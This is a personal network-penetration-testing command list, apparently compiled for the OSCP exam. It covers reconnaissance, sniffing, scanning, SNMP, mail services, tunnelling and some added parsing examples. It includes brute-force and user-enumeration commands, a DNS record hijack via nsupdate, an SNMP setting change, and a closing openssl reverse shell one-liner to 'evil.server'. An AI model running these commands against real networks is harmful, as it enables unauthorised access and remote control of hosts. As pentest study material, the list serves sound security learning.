|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 08.07.2020

Network pentesting


I started this command list for my Offensive Security Certified Professional exam. It summarizes some means to collect data and exploit vulnerabilities in a target network.

open source information


Search engines and public databases can be helpful to find additional information about the target network as well as email addresses of employees.

target information

whois <domain>
whois <target_ip>
geoiplookup <target_ip>

search engine research

www.exploit-db.com/google-dorks/
theharvester -d target.com -p all -l 200

bing ip search

ip:<target_ip>

dns lookup

dig target.com
dig -t aaaa target.com
dig -t axfr target.com @ns.target.com
fierce -dns target.com
dnsenum -f <dictfile> <domain>

dynamic dns update

nsupdate
> server 10.0.0.1
> local 127.0.0.100
> update delete server.target.com. A
> update add server.target.com. 86400 A 127.0.0.1
> send

autonomous system information

Information about autonomous systems can be found with whois, at http://ftp.arin.net/info/asn.txt or with https://www.ultratools.com/tools/asnInfo.

whois <asn>

public ip address

whereami from my netstuff repository shows some information about your current public IP address.

whereami

passive network sniffing


If you are inside the network and want to avoid detection, passive sniffing will supply information about network clients without any interaction. Make sure that your machine is not requesting an IP address via DHCP or sending IPv6 router/neighbor solicitations.

preparation

systemctl stop NetworkManager
killall dhclient
sysctl -w net.ipv6.conf.all.autoconf=0
sysctl -w net.ipv6.conf.all.accept_ra=0

dump traffic

tcpdump -i eth0 -s 262144 -w dump.pcap

monitor dns requests

passivedns -i eth0 -l /dev/stdout

passive os fingerprinting

p0f -i eth0 -o outfile

traffic analysis

To analyze the TCP streams in a pcap you can use tshark. The first command lists the TCP conversations ordered by start time and numbers them, the second follows a stream by that number.

tshark -r dump.pcap -z conv,tcp -q | sed '1,5d;$d' | awk '{print $10 " " $1 " " $2 " " $3}' | sort -g | awk '{print NR-1,$0}'
tshark -r dump.pcap -z follow,tcp,ascii,0 -q

network scanning


dynamic host configuration protocol

In my netstuff repository I have a small script using scapy to send a single DHCP packet. This way some network information can be retrieved.

dhcp_discover eth0

address resolution protocol

With scapy you can easily send ARP and RARP requests.

from scapy.all import Ether, ARP, srp
srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=TARGET_IP, psrc='0.0.0.0'))[0].show()            # ARP request: who has TARGET_IP?
srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(psrc='0.0.0.0', op=3, hwdst=TARGET_MAC))[0].show()   # RARP request: which IP belongs to TARGET_MAC?

host discovery

nmap -sn 192.168.11.0/24
nmap 192.168.11.0/24 -p 139 -oG grepable_output.txt
unicornscan 192.168.11.0/24:139
ping -I eth0 ff02::1
ping -I eth0 ff02::2

portscan

nmap -sS 192.168.11.2 -p1-65535
nmap -sU 192.168.11.2 -p1-65535
proxychains nmap -n -Pn -sT 192.168.11.2 -p445,3389,5985

os detection

nmap -O -sV 192.168.11.2

finding transparent proxies

nmap -Pn <some_extern_host> --ttl 2 -T5

transport layer security


You can retrieve the TLS certificate with openssl. In case the server requires Server Name Indication (SNI) you will have to use -servername.

openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -fingerprint
openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -connect <target>:<port> -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -showcerts -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -outform PEM > cert.pem

simple network management protocol


SNMP can be exploited for information gathering and, if you are lucky, to change settings on the host. The community strings of SNMPv1 and SNMPv2c get transmitted in clear text.
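
Because SNMPv1/v2c carry the community string as a plain BER OCTET STRING, anyone sniffing the segment (or an IDS rule) can read it. The following is an added example of my own, not part of this command list: a minimal BER decoder that pulls version, community string and requested OIDs out of a raw SNMP UDP payload and flags cleartext versions and default communities. The sample packet is constructed, not captured.

```python
DEFAULT_COMMUNITIES = {"public", "private"}
PDU_TYPES = {0xa0: "GetRequest", 0xa1: "GetNextRequest", 0xa2: "GetResponse",
             0xa3: "SetRequest", 0xa5: "GetBulkRequest"}   # v1 Trap (0xa4) has another layout

def ber_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length: 0x81 nn, 0x82 nn nn, ...
        n = length & 0x7f
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def ber_oid(value):
    """Decode a BER OBJECT IDENTIFIER value into dotted notation."""
    arcs, acc = [value[0] // 40, value[0] % 40], 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7f)
        if not b & 0x80:                    # high bit clear: last byte of this arc
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def parse_snmp(payload):
    """Decode the UDP payload of an SNMP packet; v3 is recognised but not decoded."""
    tag, msg, _ = ber_tlv(payload, 0)
    _, ver, pos = ber_tlv(msg, 0)
    version = {0: "1", 1: "2c", 3: "3"}.get(int.from_bytes(ver, "big"), "unknown")
    info = {"version": version, "community": None, "pdu": None, "oids": [],
            "cleartext": version in ("1", "2c"), "default_community": False}
    if not info["cleartext"]:
        return info
    _, community, pos = ber_tlv(msg, pos)   # the OCTET STRING any sniffer can read
    info["community"] = community.decode("latin-1")
    info["default_community"] = info["community"] in DEFAULT_COMMUNITIES
    pdu_tag, pdu, _ = ber_tlv(msg, pos)
    info["pdu"] = PDU_TYPES.get(pdu_tag, hex(pdu_tag))
    if pdu_tag not in PDU_TYPES:
        return info
    pos = 0
    for _ in range(3):                      # skip request-id, error-status, error-index
        _, _, pos = ber_tlv(pdu, pos)
    _, varbinds, _ = ber_tlv(pdu, pos)
    pos = 0
    while pos < len(varbinds):              # each VarBind is SEQUENCE { OID, value }
        _, vb, pos = ber_tlv(varbinds, pos)
        info["oids"].append(ber_oid(ber_tlv(vb, 0)[1]))
    return info

# Constructed sample (not a capture): SNMPv2c GetRequest for sysName.0, community "public"
SAMPLE = bytes.fromhex("3026 020101 0406 7075626c6963 a019 020101 020100 020100 300e 300c 0608 2b06010201010500 0500")
```

Feed it the UDP payload of port 161/162 packets from a pcap to see which hosts still talk v1/v2c with a default community.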

guess community string

nmap -Pn -sU <target> -p 161 --script=snmp-brute
onesixtyone -c <dictfile> -i <ip_list>

information gathering

To translate the OIDs into textual form, the package snmp-mibs-downloader might be needed.

snmpwalk -c public -v 2c -m ALL <target> 1
snmp-check -c public -v 2c <target>
nmap -Pn -sU <target> -p 161 --script=snmp-interfaces.nse
nmap -Pn -sU <target> -p 161 --script=snmp-processes.nse
nmap -Pn -sU <target> -p 161 --script=snmp-netstat.nse

change settings

snmpset -mALL -v1 -c secret <target> sysName.0 s hacked.host
snmpget -mALL -v1 -c secret <target> sysName.0

file transfer protocol


curl ftp://user:password@server.com
curl ftp://user:password@server.com/file.txt -o file.txt
curl ftp://user:password@server.com -Q '-DELE file.txt'

preboot execution environment


In a preboot execution environment (PXE) the hosts download and boot their operating system from a server in the network. These files can be downloaded manually to examine their content. The needed locations can be found in the DHCP packets.

download pxe binary

tftp <next-server-ip-address>
get <boot-file-name>

extract config file name

strings <boot-file-name> | grep -i tftp -A1
tftp <next-server-ip-address>
get <config file>/default

download kernel and initrd

tftp <next-server-ip-address>
get <vmlinuz-file-from-config>
get <initrd-file-from-config>

mount network block device

modprobe nbd
nbd-client <target> -N /device/name /dev/nbd0 -persist
mount /dev/nbd0 /mnt/nbd

universal plug and play


discover services

echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:rootdevice\r\n\r\n' | nc -uw 1 <target> 1900
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:all\r\n\r\n' | nc -uw 1 <target> 1900

get service control point definition

curl http://192.168.0.1:49000/igddesc.xml

simple object access protocol example

The Content-Length header must equal the byte length of the XML body, and the SOAP envelope namespace and the service namespace must not be swapped.

POST /igdupnp/control/WANIPConn1 HTTP/1.1
Accept-Encoding: identity
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
Host: 192.168.0.1:49000
Connection: close
Content-Type: text/xml
Content-Length: <byte length of the xml body>

<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:GetExternalIPAddress xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
    </u:GetExternalIPAddress>
  </s:Body>
</s:Envelope>
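
Building the request by hand makes it easy to get the Content-Length wrong, so here is an added example of my own (not from the original page) that assembles the SOAP call with a computed Content-Length, sends it over a plain socket and extracts the answer. Host, port and control URL are the ones used above; the reply is a constructed sample, not a real device response.

```python
import re
import socket

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ENC_NS = "http://schemas.xmlsoap.org/soap/encoding/"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"

def build_soap_request(host, port, control_url, service_type, action):
    """Build the raw HTTP request for a UPnP SOAP action with a correct Content-Length."""
    body = (
        '<?xml version="1.0"?>\r\n'
        f'<s:Envelope xmlns:s="{SOAP_NS}" s:encodingStyle="{ENC_NS}">\r\n'
        f'  <s:Body><u:{action} xmlns:u="{service_type}"/></s:Body>\r\n'
        '</s:Envelope>\r\n'
    ).encode()
    head = (
        f"POST {control_url} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        f'SOAPAction: "{service_type}#{action}"\r\n'
        'Content-Type: text/xml; charset="utf-8"\r\n'
        f"Content-Length: {len(body)}\r\n"     # computed from the real body, never hard-coded
        "Connection: close\r\n\r\n"
    ).encode()
    return head + body

def external_ip_from_reply(reply):
    """Pull NewExternalIPAddress out of a GetExternalIPAddress response body."""
    m = re.search(r"<NewExternalIPAddress>([^<]*)</NewExternalIPAddress>", reply)
    return m.group(1) if m else None

def call(host, port, control_url, service_type, action, timeout=5):
    """Send the request over a plain socket and return the reply body as text."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_soap_request(host, port, control_url, service_type, action))
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.partition(b"\r\n\r\n")[2].decode(errors="replace")

# Constructed sample reply (not from a real device)
SAMPLE_REPLY = (f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body>'
                f'<u:GetExternalIPAddressResponse xmlns:u="{WANIP}">'
                '<NewExternalIPAddress>203.0.113.7</NewExternalIPAddress>'
                '</u:GetExternalIPAddressResponse></s:Body></s:Envelope>')
```

Against a live gateway: external_ip_from_reply(call("192.168.0.1", 49000, "/igdupnp/control/WANIPConn1", WANIP, "GetExternalIPAddress")).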

simple mail transfer protocol


find mail server

dig -t mx <target>

get own domain name

dig -x `curl -s ifconfig.co` | grep -A1 "ANSWER SECTION"

spoofing protection

To check SPF and DMARC settings, spoofcheck can be used.

python2 spoofcheck.py target.com
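
As an added example of my own (not spoofcheck.py itself), the checks below evaluate an SPF and a DMARC TXT record for the settings that leave a domain spoofable: a missing or soft "all" mechanism, too many lookup terms, p=none, partial pct, no reporting address and unprotected subdomains. The two records are constructed samples; a live check would fetch the TXT records of target.com and _dmarc.target.com, e.g. with dig -t txt.

```python
import re

LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|a\b|mx\b|ptr\b|exists:|redirect=)", re.I)

def check_spf(record):
    """Return a list of findings for an SPF TXT record; '' means no record."""
    if not record.lower().startswith("v=spf1"):
        return ["no SPF record"]
    terms = record.split()[1:]
    findings = []
    all_term = next((t.lower() for t in terms if t.lstrip("+-~?").lower() == "all"), None)
    if all_term is None:
        findings.append("no 'all' mechanism: unlisted senders get a neutral result")
    elif all_term in ("all", "+all"):
        findings.append("+all: any host may send for this domain")
    elif all_term == "?all":
        findings.append("?all: neutral, gives no protection")
    elif all_term == "~all":
        findings.append("~all: softfail only, spoofed mail is usually still delivered")
    lookups = sum(1 for t in terms if LOOKUP_TERM.match(t))   # RFC 7208 allows at most 10
    if lookups > 10:
        findings.append(f"{lookups} DNS-lookup terms exceed the limit of 10 (permerror)")
    return findings

def check_dmarc(record):
    """Return a list of findings for the _dmarc.<domain> TXT record; '' means none."""
    if not record.upper().startswith("V=DMARC1"):
        return ["no DMARC record"]
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    findings = []
    policy = tags.get("p", "none")
    if policy == "none":
        findings.append("p=none: failures are only reported, never quarantined or rejected")
    if int(tags.get("pct", "100")) < 100:
        findings.append(f"pct={tags['pct']}: policy is applied to only part of the mail")
    if "rua" not in tags:
        findings.append("no rua: nobody receives aggregate reports")
    if tags.get("sp", policy) == "none" and policy != "none":
        findings.append("sp=none: subdomains stay unprotected")
    return findings

# Constructed sample records (not real lookups)
SAMPLE_SPF = "v=spf1 ip4:192.0.2.0/24 include:_spf.example.net ~all"
SAMPLE_DMARC = "v=DMARC1; p=none; rua=mailto:dmarc@target.com"
```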

manual tls connect

openssl s_client -connect <target>:<port> -ign_eof
HELO my.domain.name
MAIL FROM: <nobody@tempmail.de>
RCPT TO: <admin@shitmail.de>
DATA
Subject: foobar

Hello,
Bye.
.
QUIT

nmap scanning scripts

nmap -Pn --script smtp-commands <target> -p <port>
nmap -Pn --script smtp-open-relay <target> -p <port>
nmap -Pn --script smtp-enum-users <target> -p <port> --script-args 'methods={EXPN}'
nmap -Pn --script smtp-enum-users <target> -p <port> --script-args 'methods={VRFY}'
nmap -Pn --script smtp-enum-users <target> -p <port> --script-args 'methods={RCPT}'
nmap -Pn --script smtp-brute <target> -p <port>

enumerate users

smtp-user-enum -M RCPT -U <userlist> -D <target.domain> -t <host>

post office protocol (POP3) and internet message access protocol (IMAP)


nmap scanning scripts

nmap -Pn --script pop3-capabilities <target> -p <port>
nmap -Pn --script pop3-brute <target> -p <port>
nmap -Pn --script imap-capabilities <target> -p <port>
nmap -Pn --script imap-brute <target> -p <port>

netbios discovery


nbtscan -r 192.168.11.0/24
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script smb-check-vulns.nse
rpcclient -U "" 192.168.11.2

tunneling


clear to ssl forwarding

socat TCP4-LISTEN:25,fork,reuseaddr OPENSSL:target.com:465,verify=0

IPv4 to IPv6 forwarding

socat TCP4-LISTEN:25,fork,reuseaddr TCP6:target.com:25

local tunnel (opens 31337 on client)

ssh -g -L 31337:target:445 user@ssh-server
plink.exe -g -L 31337:target:445 -l user -pw password ssh-server

remote tunnel (opens 31337 on server)

ssh -R 31337:target:445 user@ssh-server
plink.exe -R 31337:target:445 -l user -pw password ssh-server

To allow connections from other hosts you have to set GatewayPorts yes in /etc/ssh/sshd_config on the server.

socks proxy

ssh -D 9050 user@ssh-server
vim /etc/proxychains.conf
proxychains nmap -Pn target -p 22

Be aware that UDP traffic is not tunneled and will bypass proxychains.

openssl backconnect shell


start server

openssl req -x509 -nodes -sha256 -subj "/CN=evil.server" -newkey rsa:2048 -keyout evil.pem -out evil.pem
openssl s_server -cert evil.pem

start client

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect evil.server:4433 > /tmp/s; rm /tmp/s

Other reverse shell commands can be found at pentestmonkey.net and highon.coffee.